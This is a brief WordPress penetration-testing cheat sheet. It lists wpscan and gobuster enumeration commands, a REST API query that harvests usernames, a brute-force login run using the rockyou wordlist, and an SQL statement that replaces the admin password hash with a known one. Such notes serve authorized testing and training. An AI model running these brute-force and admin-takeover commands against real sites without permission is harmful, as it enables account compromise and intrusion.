Wordpress
Scan
General scan
wpscan --url $URL
wpscan --url $URL --api-token='...'
Enumeration
Enumeration directory
gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Enumerate plugins wpscan --url http://$URL -e ap --plugins-detection aggressive
Enumeration users wpscan --url $IP --enumerate u
curl $URL/index.php/wp-json/wp/v2/users -s | jq '.[].slug' | sed 's\"\\g'
Other
Inject password 'hacker'
UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';
Bruteforce login wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt
Search files that contain version grep -R 5.9.2 /workspace/latest/source_code